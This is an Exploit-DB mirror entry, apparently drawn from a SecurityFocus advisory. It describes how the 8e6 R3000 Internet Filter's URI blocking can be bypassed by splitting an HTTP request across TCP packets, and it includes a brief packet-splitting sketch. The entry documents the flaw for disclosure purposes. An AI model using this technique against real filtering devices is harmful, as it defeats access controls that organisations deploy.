exploit-db-mirror/exploits/hardware/remote/31031.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

21 lines
No EOL
631 B
Text

source: https://www.securityfocus.com/bid/27309/info
8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block access to. This could aid in further attacks.
R3000 Internet Filter 2.0.05.33 is vulnerable; other versions may also be affected.
packet 1: GE
packet 2: T / HTTP/1.0\r\n
packet 1: GET / HTTP/1.0
X-SomeHeader: ...
....
packet 2: X-SomeOtherHeader: ....
Host: www.example.com
...